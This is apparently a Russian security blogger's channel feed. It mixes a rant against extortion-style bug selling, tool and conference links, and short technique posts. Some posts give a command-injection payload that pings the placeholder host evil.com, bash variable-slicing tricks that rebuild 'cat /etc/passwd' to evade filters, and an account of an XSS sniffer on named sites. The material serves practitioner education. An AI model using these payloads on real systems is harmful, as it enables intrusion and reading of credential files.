Бомбит от этих псевдогероев. Алчные шлюхи, которые позорят имя хакера, "продавая" свои уязвимости шантажируя компании, прикрываясь глупыми аргументами:

- за любую работу нужно платить
Нет. Если тебя не просили ломать сайт, какого хера ты требуешь деньги за найденные уязвимости. Одна компания проводит конкурс на взлом сейфа. А другая, допустим, ателье, просто пользуется сейфом, хранит там документацию. Вместо того, чтобы законно исследовать как работают сейфы и помочь первой компании, да ещё и за вознаграждение - ты идёшь ломать ателье. Через отверстие в стене достаешь документы о покупателях и требуешь деньги. Ну не мудак ли?

- ну это же компания, у них есть деньги
Не привыкай считать чужие деньги. И деньги эти не у разработчиков. Они получают свою зарплату и не могут позволить раздавать деньги из своего кошелька. Если нет бюджета - с этим ничего не поделаешь. Представь, ты приходишь домой, а у тебя открыта дверь. Сидит бомж, и говорит - плати. Ты богат, я нашёл уязвимость в твоей двери. Будешь платить?)

Пугает то, что общественность поддакивает таким выродкам.

Простите

Agava - забавный хостинг. Сломали мне блог, но в замен дали доступ на 400+ других сайтов :D
https://bo0om.ru/shared-hosting

Ребята из Vulners выпустили агентный opensource сканер безопасности для Redhat и Debian семейств линуксов.
Он не делает магии, не делает пентеста, а просто смотрит установленные пакеты и говорит какие из них уязвимы.
И в отличии от того же Nessus не тратит на это два часа - проверка занимает буквально миллисекунды!

Красная таблетка: https://vulners.com/#audit
Синяя таблетка: https://github.com/videns/vulners-scanner

Блогер Wylsacom (https://www.youtube.com/channel/UCt7sv-NKh44rHAEb-qCCxvA) случайно показал логин и пароль к сервису в приямой трансляции

Понравилось:
1. Не верьте никому и ничему.
2. Всегда предполагайте худший сценарий.
3. Применяйте многоуровневую защиту (Defence-in-Depth).
4. Придерживайтесь принципа «чем проще, тем лучше» (Keep It Simple Stupid, KISS).
5. Придерживайтесь принципа «минимальных привилегий».
6. Злоумышленники чуют неясность.
7. Читайте документацию (RTFM), но никогда ей не доверяйте.
8. Если это не тестировали, то это не работает.
9. Это всегда ваша ошибка!

В telegram появились интеграция с играми (через @gamee).

¯\_(ツ)_/¯

А может тут полноценный бложек завести?
anonymous poll

Давай! Флуди, пиши мнения, мне норм – 197
👍👍👍👍👍👍👍 75%

Лучше коротко и по существу – 64
👍👍 25%

👥 261 people voted so far.

Держи RCE вектор:

&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&'\"`0&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&`'

При недостаточной фильтрации пользовательских данных, которые попадают в bash интерпритатор, выполнится команда ping -c evil.com. На случай экранирования пробелов можно использовать ${IFS} - это пустая строка.

Забавный эксплойт для повышения привлегий до суперпользователя в Tomcat (на Debian).
https://vulners.com/exploitdb/EDB-ID:40450

OWASP Russia Meetup в Яндексе, в следующую среду.

Доклады:
[*] Web application firewalls: анализ логики обнаружения атак
[*] Безопасность TLS в роще доменов
[*] Software development lifecycle: финальный аудит безопасности и его автоматизация

https://events.yandex.ru/events/yagosti/12-oct-2016/

Не умеют парсить.
Сунул я как-то XSS вектор в статус instagram, без повода и цели - смотрю, а XSS срабатывает. Начал отправлять себе на сервер содержимое окна, текущий урл, получился такой вот сниффер. Так вот, XSS сработали на:

- findgram.me
- imgrab.com
- instagy.com
- iconosquare.com
- tofo.me
- photo.sh
- gramosphere.com

Что за сервисы я не сильно представляю, но с фильтрацией пользовательских данных у них не очень.

За большинством кибератак стоят дети и мошенники, а не государство
https://goo.gl/Wyr8JG

И ещё о bash.

Из переменных (и не только) можно склеивать команды, тем самым можно обойти системы обнаружения и фильты (ну мало ли).

Например, переменная COMP_WORDBREAKS — набор символов рассматриваемые как разделители слов.

echo $COMP_WORDBREAKS
вернет
"'><=;|&(:

Обращаясь к переменным, в таком представлении, можно вернуть один или несколько символов (первое после двоеточия число - начальное значение символа, вторая цифра - количество символов)

echo ${COMP_WORDBREAKS:11:2}
вернет (:

Подобным образом можно собрать полноценную команду, склеивая кусочки переменных
cat${COMP_WORDBREAKS:0:1}${PATH:0:1}etc${HOME:0:1}passwd
что будет интерпретировано как cat /etc/passwd

Ну или даже так:
${SHELLOPTS:3:1}at ${PATH:0:1}${SHELLOPTS:4:1}t${SHELLOPTS:3:1}${HOME:0:1}p${SHELLOPTS:2:1}sswd

Кстати, тот самый доклад Владимира Иванова, о котором я говорю в описании своего доклада :)

https://www.blackhat.com/docs/us-16/materials/us-16-Ivanov-Web-Application-Firewalls-Analysis-Of-Detection-Logic.pdf

Версия на русском:
https://youtu.be/50Sv1_nsjnE?t=9m37s

¯ \ _ (ツ) _ / ¯

Вышел новый ядерный эксплойт повышения привелегий до суперпользователя в linux, в том числе под свежие ядра, использует race condition, а именуется грязной скотиной

https://dirtycow.ninja